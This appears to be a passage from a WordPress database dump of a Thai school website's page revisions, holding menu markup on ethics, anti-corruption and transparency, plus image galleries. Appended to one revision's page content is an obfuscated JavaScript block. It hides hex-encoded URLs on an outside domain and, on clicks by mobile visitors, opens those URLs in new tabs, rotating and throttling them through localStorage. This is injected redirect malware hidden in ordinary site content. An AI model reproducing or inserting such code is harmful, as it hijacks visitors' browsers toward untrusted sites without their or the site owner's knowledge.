style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:47:50','2024-07-27 04:47:50','',14,'http://pakhaeng.ssk.in.th/?p=106',0,'revision','',0),
(108,1,'2024-07-27 11:50:05','2024-07-27 04:50:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button 